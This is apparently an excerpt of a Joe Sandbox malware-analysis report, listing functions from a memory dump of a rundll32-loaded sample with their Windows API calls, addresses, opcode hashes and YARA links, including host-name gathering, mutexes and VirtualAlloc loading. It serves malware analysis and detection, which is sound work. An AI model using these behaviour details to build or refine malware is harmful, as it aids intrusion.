                          • Instruction ID: 8ad25efc9e27538c913fe90bdc85a5005b0e81570be80150acd528eb367e9ceb
                          • Opcode Fuzzy Hash: 72e2bde36913e98a622098e7997089bf1cd0ebc9d61eb63b9ae03f06eb31b5e8
                          • Instruction Fuzzy Hash: 0A117C72610218BFCB11AF64CC85DAE7F6AFB04360B155056FA09A7251DA35FA10DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7F791 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05B6261E,00000000,00000000,00000008,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F7A7
                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 05B7F7BA
                          • lstrcpy.KERNEL32(00000008,05B6261E), ref: 05B7F7DC
                          • GetLastError.KERNEL32(05B64A0A,00000000,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F805
                          • HeapFree.KERNEL32(00000000,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F81D
                          • CloseHandle.KERNEL32(00000000,05B64A0A,00000000,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F826
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                          • String ID:
                          • API String ID: 2860611006-0
                          • Opcode ID: c64ea609046c2f0d254d07c1b16bb74df65ab2137cd3eb4f6422b32f37f9863d
                          • Instruction ID: 303f093e07f08e03690b536c3c34a17e4c171c8e7178b7a89f9a00c8c1de0da9
                          • Opcode Fuzzy Hash: c64ea609046c2f0d254d07c1b16bb74df65ab2137cd3eb4f6422b32f37f9863d
                          • Instruction Fuzzy Hash: 17117C7550424AEFCB109F64D8898BA7FAAFF0026471045AAF926D7250DB30BD45DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7508C Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                          • GetCurrentThreadId.KERNEL32 ref: 05B750C4
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                          • lstrcpy.KERNEL32(00000000), ref: 05B75100
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 1175089793-0
                          • Opcode ID: 7a4ff55ae737e1d53fde673a3d4f777f58ef7d3a069acd496067432fc8425698
                          • Instruction ID: b6e45fef70f1973cc61e2a17eac92481e5346d619210fb882fed468235e414d7
                          • Opcode Fuzzy Hash: 7a4ff55ae737e1d53fde673a3d4f777f58ef7d3a069acd496067432fc8425698
                          • Instruction Fuzzy Hash: BE01A132A201197BD7309BA58C8AE7B3FADEF81A41B290495B916D3180EE70F800C7B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B64F2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B64FB8
                          • lstrlen.KERNEL32(?,?), ref: 05B64FE9
                          • memcpy.NTDLL(00000008,?,00000001), ref: 05B64FF8
                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 05B6507A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlenmemcpy
                          • String ID: W
                          • API String ID: 379260646-655174618
                          • Opcode ID: cce64acf448a866a8089eff3a83ba7691ea72db29bbaa8b495559a95ffa8c356
                          • Instruction ID: e1d54f437e6477bd9d2c7105320a7d522bcf78f51b740d3e6c0e9d263fa31ed0
                          • Opcode Fuzzy Hash: cce64acf448a866a8089eff3a83ba7691ea72db29bbaa8b495559a95ffa8c356
                          • Instruction Fuzzy Hash: 2741C530204A069FCF349F58D884BAA7BEAFB05314F5484AAE45ACB290C739F555CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7596C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B75A17
                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 05B75A84
                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 05B75A8E
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: BuffersErrorFileFlushLastmemset
                          • String ID: K$P
                          • API String ID: 3817869962-420285281
                          • Opcode ID: 1e0896518f4caf884080531de079277adfa49d12d04d83ad019f6d587bce140c
                          • Instruction ID: 13d3db92003281efaba1c9f05fa10224c67f453975896303f6e58f346e14d62b
                          • Opcode Fuzzy Hash: 1e0896518f4caf884080531de079277adfa49d12d04d83ad019f6d587bce140c
                          • Instruction Fuzzy Hash: 1B414D70A04B099FDB34CF64C984ABEBBF1FF44614F5489ADD4A693680D734B944CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D0E3 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                          Download Yara Rule
                          APIs
                          • memcpy.NTDLL(?,05B6DE40,00000000,?,?,?,05B6DE40,?,?,?,?,?), ref: 05B6D121
                          • lstrlen.KERNEL32(05B6DE40,?,?,?,05B6DE40,?,?,?,?,?), ref: 05B6D13F
                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 05B6D1AE
                          • lstrlen.KERNEL32(05B6DE40,00000000,00000000,?,?,?,05B6DE40,?,?,?,?,?), ref: 05B6D1CF
                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 05B6D1E3
                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 05B6D1EC
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05B6D1FA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlenmemcpy$FreeLocal
                          • String ID:
                          • API String ID: 1123625124-0
                          • Opcode ID: 7a11485df8fba293a6272f19a26a6e3f0d0bf59c7a6244d9aab6d188cd6097be
                          • Instruction ID: b8c1c6014579e41f310229ebb28a9c071d482a1d962e155bfd6e33980b232a9a
                          • Opcode Fuzzy Hash: 7a11485df8fba293a6272f19a26a6e3f0d0bf59c7a6244d9aab6d188cd6097be
                          • Instruction Fuzzy Hash: 454116B690021AAFCF10EF65DC458AB3FA9FF042A0B154065FC09A7211E775EE60CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B62009 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05B62028,?), ref: 05B6867A
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05B62028,?), ref: 05B68697
                          • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 05B62055
                          • lstrlenW.KERNEL32(00000008,?,?,?), ref: 05B6205C
                          • lstrlenW.KERNEL32(?,?,?,?,?), ref: 05B6207A
                          • lstrlen.KERNEL32(00000000,?,00000000), ref: 05B62138
                          • lstrlenW.KERNEL32(?), ref: 05B62143
                          • wsprintfA.USER32 ref: 05B62185
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                          • String ID:
                          • API String ID: 1727939831-0
                          • Opcode ID: dccedf223162223da647bbeb35938b429868f0b45adc89cfcdc0e7cafaf763b6
                          • Instruction ID: a468bf084bac066a25239ef0c544c6aef0318268969177411f4a709312da3fe5
                          • Opcode Fuzzy Hash: dccedf223162223da647bbeb35938b429868f0b45adc89cfcdc0e7cafaf763b6
                          • Instruction Fuzzy Hash: 1E513175A00109AFDF05EFA4DD89DBEBBBAFF44210B1540A5F914A7210EB39FA11DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B67DF5 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05B75583,00000000,00000000), ref: 05B67E46
                          • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05B67ED9
                          • GetLastError.KERNEL32(?,?,0000011F), ref: 05B67F31
                          • GetLastError.KERNEL32 ref: 05B67F63
                          • GetLastError.KERNEL32 ref: 05B67F77
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,05B75583,00000000,00000000,?,05B63EC6,?), ref: 05B67F8C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$memcpy
                          • String ID:
                          • API String ID: 2760375183-0
                          • Opcode ID: b93a1fc53ce755e26b5e15984066808186bbcbd2df875378efe18e5c2f9edf9c
                          • Instruction ID: b5747ec77ead33ac7aef1004d79a10acaba96dc2f95f7261cda32f913835841d
                          • Opcode Fuzzy Hash: b93a1fc53ce755e26b5e15984066808186bbcbd2df875378efe18e5c2f9edf9c
                          • Instruction Fuzzy Hash: 5B515971910249BFDF10DFA4DC88EAEBBBAFB04354F044465F915E7280DB34AA55CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7ADF7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(?,00000020), ref: 05B7AEF4
                          • lstrcat.KERNEL32(?,00000020), ref: 05B7AF09
                          • lstrcmp.KERNEL32(00000000,?), ref: 05B7AF20
                          • lstrlen.KERNEL32(?), ref: 05B7AF44
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                          • String ID:
                          • API String ID: 3214092121-3916222277
                          • Opcode ID: 5f38b6f5e1e6b21f3da848222d5714ccf45f28cbaeb5c754025d6e7b073ab00d
                          • Instruction ID: ae3de961f58eb66d3e09644fee95a8b5e8bec3ab65334109a200f8198cb4e058
                          • Opcode Fuzzy Hash: 5f38b6f5e1e6b21f3da848222d5714ccf45f28cbaeb5c754025d6e7b073ab00d
                          • Instruction Fuzzy Hash: 75519E71A0460CEBCF61DF99C984AADBBB6FF45714F15809AE8369F241C770BA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D581 Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5A3
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5B4
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5C6
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5D8
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5EA
                          • lstrlenW.KERNEL32(?,05B83D54,05FB9A2B,00000057), ref: 05B6D5F6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen
                          • String ID:
                          • API String ID: 1659193697-0
                          • Opcode ID: fac3fa2521d9e11fc8d6d94a7ab888dd3b728ab245a07620be5fce11e8fe3014
                          • Instruction ID: 34f642bc511cdb3c1904f5831d35bdd12f65e8a6e3a9f475900cd5cba1890b67
                          • Opcode Fuzzy Hash: fac3fa2521d9e11fc8d6d94a7ab888dd3b728ab245a07620be5fce11e8fe3014
                          • Instruction Fuzzy Hash: BD41E071F0060AAFCB10DF99C884A6EB7FAFF94204B1489A9E556E7600D774F9058B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75C28 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B724C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05B724CF
                            • Part of subcall function 05B724C3: SetLastError.KERNEL32(000000B7,?,05B75C3C,?,?,00000000,?,?,?), ref: 05B724E0
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05B75C5C
                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05B75D34
                            • Part of subcall function 05B6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05B6A990
                            • Part of subcall function 05B6A976: CreateWaitableTimerA.KERNEL32(05B8A1E8,00000001,?), ref: 05B6A9AD
                            • Part of subcall function 05B6A976: GetLastError.KERNEL32(?,00000000,05B78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B6A9BE
                            • Part of subcall function 05B6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6A9FE
                            • Part of subcall function 05B6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA1D
                            • Part of subcall function 05B6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA33
                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05B75D1D
                          • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05B75D26
                            • Part of subcall function 05B724C3: CreateMutexA.KERNEL32(05B8A1E8,00000000,?,?,05B75C3C,?,?,00000000,?,?,?), ref: 05B724F3
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 05B75D41
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                          • String ID:
                          • API String ID: 1700416623-0
                          • Opcode ID: 9e579c809d6d0816db5bd8b1d14c0de04b0591be41c1ecccab971afcb300adf1
                          • Instruction ID: 38416d790f57d77a58715d6f9975456c53e015136963acfdc28e8b3ffc1ad038
                          • Opcode Fuzzy Hash: 9e579c809d6d0816db5bd8b1d14c0de04b0591be41c1ecccab971afcb300adf1
                          • Instruction Fuzzy Hash: 4B318675610208AFCB11AF74D84AD7D7FB7FB88310B2544A5F926DB290EA35B940CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C20F Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B7C228
                            • Part of subcall function 05B6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05B67D5E), ref: 05B6A6BE
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,05B689E4,00000000), ref: 05B7C26A
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 05B7C2BC
                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,05B689E4,00000000), ref: 05B7C2D5
                            • Part of subcall function 05B6E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B6EA0D
                            • Part of subcall function 05B6E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,05B7C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 05B6EA50
                          • GetLastError.KERNEL32(?,00000000,05B689E4,00000000,?,?,?,?,?,?,?,05B69100,?), ref: 05B7C30D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                          • String ID:
                          • API String ID: 1921436656-0
                          • Opcode ID: 7b5f453024f53050d6d30ae8d120be259ee42f707c552b3b82f5a9883917217b
                          • Instruction ID: bd3b82cd40bf16035e5ae67118c8cba6c94c0a9d3cda613fd9f733653a0386b7
                          • Opcode Fuzzy Hash: 7b5f453024f53050d6d30ae8d120be259ee42f707c552b3b82f5a9883917217b
                          • Instruction Fuzzy Hash: CE310A75A10209ABDF25DF94C885EBE7FB6FF08650F01109AF915A7290DB34BE44DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B69FF6 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 05B6A078
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6A091
                          • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 05B6A09E
                          • lstrlen.KERNEL32(05B8B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 05B6A0B0
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 05B6A0E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                          • String ID:
                          • API String ID: 2734445380-0
                          • Opcode ID: 5783d8962f63a233ec3736bf5aaf71dbd0252a8b9a9d6890682d0fccdf03cc1c
                          • Instruction ID: b7fbf5a5999ad71513c0d0893d45f46dc037fccda5741fe2d69d1a722b066dbd
                          • Opcode Fuzzy Hash: 5783d8962f63a233ec3736bf5aaf71dbd0252a8b9a9d6890682d0fccdf03cc1c
                          • Instruction Fuzzy Hash: EE313A72500209FFCB11DF95DC89EEA7FB9FF44210F148054F919A2240EB79B955DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6DD77 Relevance: 7.6, APIs: 5, Instructions: 91memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05B63DA2,00000000,00000001,?,?,?), ref: 05B6DD92
                          • lstrlen.KERNEL32(?), ref: 05B6DDA2
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6DDD6
                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05B6DE01
                          • memcpy.NTDLL(00000000,?,?), ref: 05B6DE20
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6DE81
                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05B6DEA3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                          • String ID:
                          • API String ID: 3204852930-0
                          • Opcode ID: 92e8ee774e3b8dffece3496f0b459b5a8f66e44ed81ec132fba07759b912942a
                          • Instruction ID: 6f76271534c280a1d1ca5ad201612c968bd51444d6feab3688dfc8228ea52c76
                          • Opcode Fuzzy Hash: 92e8ee774e3b8dffece3496f0b459b5a8f66e44ed81ec132fba07759b912942a
                          • Instruction Fuzzy Hash: 7F311AB290020AAFCF11DFA5CC859AE7FB9FF18244F044469F915A7211E735EA54DFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B71ECD Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B770C3: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B770CB
                            • Part of subcall function 05B770C3: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B770E0
                            • Part of subcall function 05B770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 05B770F9
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B71F04
                          • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,05B78667,?,00000000), ref: 05B71F15
                          • lstrcmpi.KERNEL32(00000002,?), ref: 05B71F5B
                          • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05B78667,?,00000000), ref: 05B71F6F
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05B78667,?,00000000), ref: 05B71FB5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                          • String ID:
                          • API String ID: 733514052-0
                          • Opcode ID: 0240cad9ea62b2507a1dd958e92fd833048660fd6d2bcc3de6ba89add7f24658
                          • Instruction ID: bec79e89b2927b2157ae7c7dca9b1656c6544ce58dced484b72941e8e4b15305
                          • Opcode Fuzzy Hash: 0240cad9ea62b2507a1dd958e92fd833048660fd6d2bcc3de6ba89add7f24658
                          • Instruction Fuzzy Hash: EC31A572A10618BFDB109FA8DC88AAE7FBAFB04254F144069F915AB240D735BD45DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6242A Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,05B6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7D58C
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B62454
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B62467
                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05B62478
                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 05B624E3
                          • InterlockedIncrement.KERNEL32(05B8A43C), ref: 05B624FA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                          • String ID:
                          • API String ID: 3915436794-0
                          • Opcode ID: 25492d060cc27fdcfff80ddd9f65c4ce01177583373128e673454d052660491f
                          • Instruction ID: 70e8c1a1a072912af76912575918b59c656265d36c557a630c6acf68f2b64a6d
                          • Opcode Fuzzy Hash: 25492d060cc27fdcfff80ddd9f65c4ce01177583373128e673454d052660491f
                          • Instruction Fuzzy Hash: 3131E136A052029FDB21DF28D85993AFBFAFB84335B04595AF95583240CB38F811CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B686AD Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,05B6E23D,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B686CD
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B686E2
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B686FE
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B68713
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B68727
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$AddressProc
                          • String ID:
                          • API String ID: 1469910268-0
                          • Opcode ID: 814f596abf8925a34ffef21a97de07fd12c35b30fed7610b37825ff091a01233
                          • Instruction ID: e4d052d2dd19c95c6a8555e6a4ca3fc172d804db78bcd902a11b543fe749e212
                          • Opcode Fuzzy Hash: 814f596abf8925a34ffef21a97de07fd12c35b30fed7610b37825ff091a01233
                          • Instruction Fuzzy Hash: 443141756202119FCB05EF68D482E757BEAFB0A7207916096F605D7350DB78F842CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B78327 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 05B7833B
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 05B78357
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 05B78391
                          • GetComputerNameW.KERNEL32(?,?), ref: 05B783B4
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 05B783D7
